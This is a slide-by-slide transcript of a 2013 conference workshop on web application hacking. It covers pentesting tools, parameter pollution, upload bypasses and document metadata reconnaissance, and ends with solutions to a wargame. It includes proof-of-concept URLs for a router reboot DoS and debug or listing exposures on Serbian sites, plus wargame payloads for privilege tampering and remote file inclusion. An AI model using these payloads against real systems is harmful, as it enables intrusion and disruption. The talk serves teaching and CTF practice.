hand’s on web hacking balccon 2k13 · pentesting web applications o osint / google hacking o...
TRANSCRIPT
![Page 2: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/2.jpg)
Self promotion :D
![Page 3: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/3.jpg)
Disclaimer
• This presentation represent my personal thoughts, and not of my employers nor clients.
• All research are conducted for educational purpose only.
• If you get in trouble after this session I can’t help you. Your irresponsibility is not in my concern.
![Page 4: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/4.jpg)
Today we will … • Talk about penetration testing everyday situations
• Make quik overview of common web application vulnerabilities and really funny developer ideas
• Remember some old technics and meet few very creative and new
• See what “malicious pentester” do when find vulnerability in old web applications
• Find out how to get paid for long nights and red bulls :)
• Play WARGAME with new levels
![Page 5: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/5.jpg)
Pentesting Web Applications
o OSINT / Google Hacking
o Passive analysis
o Automated analysis
o Social Engineering
![Page 6: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/6.jpg)
My toolbox
• Proxy (BurpSuite) • Fuzzers (DirBuster, DFF Scanner) • DB Exploatation => SQLMAP • Vulnerability scanners (Skipfish, Nikto, BurpSuite,
w3af, IBM Rational AppScan, Acunetix)
• Firefox with plugins! • Custom scripting rulez (html, js, php, python, ruby, perl, C, bash, powershell, asp,…)
![Page 7: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/7.jpg)
Firefox + Plugins
• Firebug
• Web Developer
• Tamper Data
• Proxy Switcher
• Live HTTP headers
• RESTClient
• ScreenGrabber, Colorzilla, Greasemonkey, User Agent Switcher, XSS ME, …
![Page 8: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/8.jpg)
OWASP TOP 10
Local chapter: https://www.owasp.org/index.php/Serbia
![Page 9: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/9.jpg)
More interesting staff:
• Blind SQL injection (SQLMap)
• HTTP parameter pollution & contamination
• Upload forms failure to failure (gif2php)
• Living dead VB script
• Document Properties
• HTTP QUERIES, few funny ones :)
![Page 10: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/10.jpg)
HPP & HPC • HPP POC :
http://website.tld/index.php?a=1&a=1
a = ?
Link: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
• HPC POC:
http://website.tld/index.php?a[=1
a = ?
Link: http://www.exploit-db.com/wp-content/themes/exploit/docs/17534.pdf
![Page 11: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/11.jpg)
HPP & HPC / MS EXAMPLE
https://www.microsoft-careers.com/search
?q=test&q=test
?q.=test&q=123
![Page 12: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/12.jpg)
Upload forms failure to failure
• UPLOAD RESTRICTIONS:
– MIME TYPE
– FILE EXTENSION
What about content review?
Or “polymorphic” files?
![Page 13: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/13.jpg)
gif2php
![Page 14: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/14.jpg)
Living dead VB script
• Not so common this days but very popular in old banking managed windows networks :)
• Nice tool to be used for exploatation of Internet Explorer users trough social engeneering attacks
• Not forget about it!
![Page 15: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/15.jpg)
Document Properties
• Document from websites can provide you very usefull informations about your target: … versions of application and files, people names, emails, network addresses, printers, comments, …
• Forensic FOCA, HTTrack Website Copier
• Custom scripting!
![Page 16: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/16.jpg)
Document Properties
In one old research I use only HTTrack and two custom wroted scripts in power shell to get a bunch of interesting informations about banks in Serbia :D
![Page 17: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/17.jpg)
Document Properties
http://security-net.biz/files/Napad-na-atribute-online-dokumenata-%5Bprimer-banke-u-Srbiji%5D_Ivan-Markovic-NSS.pdf
![Page 18: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/18.jpg)
HTTP QUERIES, QUERIES :)
• Public directory listing on website of one of biggest company in Serbia: http://www.site.rs/anydir?.listing
• Public debug functions in News Publishing application from Serbia:
http://www.site.rs/anyfile?&debug
![Page 19: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/19.jpg)
Public secret
Everyone know that Serbian web sites are not very popular for hackers and their bussiness? XSS and CSRF are not marked red?
![Page 20: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/20.jpg)
More fun info :)
• KEYLOGGER on web presentation on one of banks in Serbia! (Year 2010)
![Page 21: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/21.jpg)
More fun info :)
• XXX content on “MB Brewery” in Serbia:
![Page 22: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/22.jpg)
More fun info :)
• Serbian Telekom ADSL ruter Authentication Bypass + CSRF = DoS :D
• http://PUBLIC_IP_OF_USER/rebootinfo.cgi
• POC: Huawei HG510 (Year 2010 and still work)
For more details: http://www.routerpwn.com/
![Page 23: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/23.jpg)
More backdoors on web servers
![Page 24: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/24.jpg)
More backdoors on web servers
![Page 25: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/25.jpg)
More backdoors on web servers
![Page 26: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/26.jpg)
More backdoors on web servers
![Page 27: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/27.jpg)
More backdoors on web servers
![Page 28: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/28.jpg)
More backdoors on web servers
![Page 29: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/29.jpg)
Bounty programs
• http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html
• (Google, PayPal, Adobe, Mozilla, Facebook, …)
• And one from Serbia: https://managewp.com/white-hat-reward
![Page 30: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/30.jpg)
Wargame
• Level 1: – Decripted (base64): “Hi Nate, URL params are still works.” – Bingo: http://wargame.balccon.org/index.php?admin=1
![Page 31: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/31.jpg)
Wargame
• Level 2:
Bingo (HPP): http://wargame.balccon.org/index.php?cmd=ssh+10&cmd=4&cmd=55&cmd=2
![Page 32: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/32.jpg)
Wargame
• Level 3:
Bingo: Decrypted (Cookie: (role, user)) => role = admin
![Page 33: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/33.jpg)
Wargame • Level 4:
Bingo: DirBuster => http://wargame.balccon.org/public/target.txt http://wargame.balccon.org/index.php?file=public/target
![Page 34: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/34.jpg)
Wargame • Level 4:
http://wargame.balccon.org/public/target.txt
BINGO: http://wargame.balccon.org/index.php?file=public/target&switch=1
<?php $switch = $_GET['switch']; ?>
![Page 35: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/35.jpg)
Wargame • Level 5:
http://wargame.balccon.org/public/manual.txt
$RFI->Load->Remote(return [FUNC]) use content from remote source as code [FUNC].
... For remote calls please use RFI POST variable. ...
![Page 36: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/36.jpg)
Wargame • Level 5:
BINGO (OR ANY REMOTE FILE with that content): http://wargame.balccon.org/public/loadAllFunctions.dat
loadAllFunctions HTTP POST: http://wargame.balccon.org/ ?RFI=http://wargame.balccon.org/public/loadAllFunctions.dat
![Page 37: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/37.jpg)
Wargame
![Page 38: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/38.jpg)
Wargame / Press Start
New Levels http://wargame.balccon.org/
![Page 39: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/39.jpg)
Outro
Thanks :) [email protected]
"If you think you are too small to make a difference,
try sleeping with a mosquito." - Dalai Lama XIV